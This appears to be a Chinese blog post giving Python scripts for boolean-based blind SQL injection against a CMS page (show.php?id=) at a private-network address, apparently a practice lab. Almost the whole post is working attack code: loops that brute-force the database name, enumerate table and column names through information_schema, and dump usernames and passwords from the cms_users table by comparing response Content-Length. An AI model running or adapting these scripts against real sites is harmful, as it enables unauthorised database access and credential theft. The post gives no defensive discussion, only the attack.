-
SQL注入漏洞:CMS布尔盲注python脚本编写
SQL注入漏洞:CMS布尔盲注python脚本编写
库名爆破
import requests #库名 database="" x=0 while requests.get(url=f"http://10.9.47.77/cms/show.php?id=33%20and%20length(database())={x}").headers['Content-Length']!= '5263': x+=1 #爆出当前库名长度 for j in range(1,x+1): # 对库名的每个字符进行爆破 for i in range(20,127): response=requests.get(url=f"http://10.9.47.77/cms/show.php?id=33%20and%20ascii(substr(database(),{j},1))={i}") #爆破库名 if response.headers['Content-Length']== "5263" : #如果长度为5263说明爆破成功 database=database+chr(i) print(database) #打印库名- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
效果:
爆破表名
table_name_list=[] x=0 while requests.get(url=f"http://10.9.47.77/cms/show.php?id=35%20and%20length((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20{x},1))<999").headers['Content-Length'] == "5146": x+=1 #统计表的数量 for i in range(0,x): y=1 while requests.get(url=f"http://10.9.47.77/cms/show.php?id=35%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20{i},1),{y},1))%3E20").headers['Content-Length']== "5146": y+=1 #统计每个表名有几个字符 table_name = "" for j in range(1,y): # 对每个表名里的字符进行爆破 for k in range(20,127): if requests.get(url=f"http://10.9.47.77/cms/show.php?id=35%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20{i},1),{j},1))={k}").headers['Content-Length'] == "5146": table_name+=chr(k) print(table_name) table_name_list.append(table_name) print(table_name_list)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
用户名密码爆破
import requests x=0 account_list=[] while requests.get(url=f"http://10.9.47.77/cms/show.php?id=35 and length((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit {x},1))").headers["Content-Length"] == "5146": x += 1 #x为字段个数 print("所有表名:") for i in range(0,x+1): account = "" for j in range(1,100): flag=0 for k in range(20,127): if requests.get(url=f"http://10.9.47.77/cms/show.php?id=35 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit {i},1),{j},1))={k}").headers["Content-Length"] == "5146": account+=chr(k) flag=1 if flag== 0: break print(account) account_list.append(account) user_List=[] password_list=[] for l in account_list: if l=="username" or l == "password": for i in range(0,100): flag=0 user = "" password = "" for j in range(1,100): dump=0 for k in range(20,127): if requests.get(url=f"http://10.9.47.77/cms/show.php?id=35 and ascii(substr((select {l} from cms_users limit {i},1),{j},1))={k}").headers["Content-Length"] == "5146": if l=="username": user+=chr(k) dump=1 else: password+=chr(k) dump=1 if dump==0: break flag=1 if flag==0: break if l == "username": user_List.append(user) else: password_list.append(password) print("账号:密码") for i in range(0,len(user_List)) : print(f"{user_List[i]}:{password_list[i]}")- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
-
相关阅读:
排列组合总结
.Net预处理器指令
2024上海国际人工智能展(CSITF)“创新驱动发展·科技引领未来”
如何设置跨域隔离启用 SharedArrayBuffer
实时操作系统Freertos开坑学习笔记:(八):信号量、事件标志组、任务通知机制
报名仅剩一周!课程直播和1V1指导助力文心一言插件开发赛事冲榜
【SVM分类】基于matlab粒子群算法优化SVM分类【含Matlab源码 1859期】
C++中的this指针
Windows Server 2012服务器无法识别ADB Interface的解决办法
LeetCode17电话号码的字母组合
- 原文地址:https://blog.csdn.net/weixin_70137901/article/details/134273234
